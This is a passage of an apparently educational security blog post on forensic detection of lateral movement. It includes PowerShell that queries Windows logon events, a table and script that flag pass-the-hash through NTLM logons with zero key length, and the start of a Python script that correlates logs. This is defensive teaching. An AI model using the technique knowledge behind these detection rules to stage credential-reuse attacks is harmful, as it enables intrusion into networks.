}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">    } catch {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"Failed on $dc : $_\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Sort and display the movement chain</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$authEvents | Sort-Object Timestamp | Format-Table Timestamp, EventID, SourceIP, Workstation, ServiceName, LogonType, AuthPackage -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Export for correlation with NetFlow and DNS data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$authEvents | Export-Csv \"auth_chain_${targetAccount}.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"53-detecting-pass-the-hash-vs-kerberos-vs-legitimate-auth\">5.3 Detecting Pass-the-Hash vs. Kerberos vs. Legitimate Auth<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#53-detecting-pass-the-hash-vs-kerberos-vs-legitimate-auth\" class=\"hash-link\" aria-label=\"Direct link to 5.3 Detecting Pass-the-Hash vs. Kerberos vs. Legitimate Auth\" title=\"Direct link to 5.3 Detecting Pass-the-Hash vs. Kerberos vs. 
Legitimate Auth\" translate=\"no\">​</a></h3>\n<p>The authentication package field in Event 4624 reveals the technique:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event 4624 field analysis for lateral movement technique identification:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=3 (Network) + AuthPackage=NTLM + Source workstation mismatch = Pass-the-Hash</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=3 (Network) + AuthPackage=Kerberos + Normal hours = Likely legitimate</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=3 (Network) + AuthPackage=Kerberos + Off hours + no prior logon type 2 on that host = Suspicious</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=9 (NewCredentials) + AuthPackage=NTLM = Explicit alternate credentials (runas /netonly or Invoke-Command with PSCredential)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=10 (RemoteInteractive) = RDP session</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Pass-the-Hash specific indicator in Event 4624:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  KeyLength: 0    ← This field being 0 in a Type 3 NTLM logon</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    indicates no session key negotiated = pass-the-hash</span><br></span></code></pre></div></div>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Detect pass-the-hash by finding Type 3 NTLM logons with KeyLength=0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># and where the workstation doesn't match the source IP DHCP assignment</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$pthIndicators = Get-WinEvent -ComputerName $dc -FilterHashtable @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LogName = 'Security'; Id = 4624; StartTime = $startTime; EndTime = $endTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $xml = 
[xml]$_.ToXml()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $data = $xml.Event.EventData.Data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $logonType  = ($data | Where-Object Name -eq 'LogonType').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $authPkg    = ($data | Where-Object Name -eq 'AuthenticationPackageName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $keyLength  = ($data | Where-Object Name -eq 'KeyLength').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $sourceIP   = ($data | Where-Object Name -eq 'IpAddress').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $workstation = ($data | Where-Object Name -eq 'WorkstationName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $account    = ($data | Where-Object Name -eq 'TargetUserName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Pass-the-hash indicators:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Type 3 network logon + NTLM + KeyLength 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($logonType -eq '3' -and $authPkg -eq 'NTLM' -and $keyLength -eq '0') {</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Timestamp   = $_.TimeCreated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Account     = $account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            SourceIP    = $sourceIP</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Workstation = $workstation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            KeyLength   = $keyLength</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Indicator   = 'POSSIBLE_PASS_THE_HASH'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Where-Object { $_ -ne $null }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$pthIndicators | Sort-Object Timestamp | Format-Table -AutoSize</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-6--cross-source-correlation-building-the-attack-timeline\">Part 6  Cross-Source Correlation: Building the Attack Timeline<a 
href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-6--cross-source-correlation-building-the-attack-timeline\" class=\"hash-link\" aria-label=\"Direct link to Part 6  Cross-Source Correlation: Building the Attack Timeline\" title=\"Direct link to Part 6  Cross-Source Correlation: Building the Attack Timeline\" translate=\"no\">​</a></h2>\n<p>This is where the forensic picture comes together. Each source tells a partial story. The JOIN across all four sources builds the complete lateral movement timeline.</p>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"61-the-correlation-script-joining-all-four-sources\">6.1 The Correlation Script: Joining All Four Sources<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#61-the-correlation-script-joining-all-four-sources\" class=\"hash-link\" aria-label=\"Direct link to 6.1 The Correlation Script: Joining All Four Sources\" title=\"Direct link to 6.1 The Correlation Script: Joining All Four Sources\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#!/usr/bin/env python3</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 
13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Cross-source correlation engine for network forensics.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Joins NetFlow, DHCP, DNS cache, and Windows auth logs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">to reconstruct lateral movement timelines.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"display:inline-block;color:hsl(139, 66%, 32%)\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Input files:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  - netflow.csv:   ts, src_ip, dst_ip, dst_port, bytes, flags</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  - dhcp.csv:      timestamp, event_type, ip, hostname, mac</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  - auth.csv:      timestamp, event_id, source_ip, account, logon_type, auth_pkg, key_length</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  - dns_cache.csv: source_host, resolved_hostname, resolved_ip, ttl</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string 
string\" style=\"display:inline-block;color:hsl(139, 66%, 32%)\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Output:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  Lateral movement events with full context enrichment.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> json</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> datetime </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> timedelta</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> collections </span><span class=\"token keyword\" 
style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> defaultdict</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">class</span><span class=\"token plain\"> </span><span class=\"token class-name\" style=\"color:hsl(26, 100%, 29%)\">NetworkForensicsCorrelator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">__init__</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">ip_timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\">      </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ip -&gt; [(start, end, hostname, mac)]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">auth_events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">      </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># list of auth log records</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">netflow_events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># list of flow records</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">dns_observations </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> 
</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"> </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># source_host -&gt; [resolved_ips]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">load_dhcp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Load and build IP timeline from DHCP logs.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> row </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> csv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">DictReader</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token 
plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">fromisoformat</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                      
  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> KeyError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Build timeline (simplified)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        active </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        timeline </span><span class=\"token 
operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> defaultdict</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ev </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            ip </span><span class=\"token 
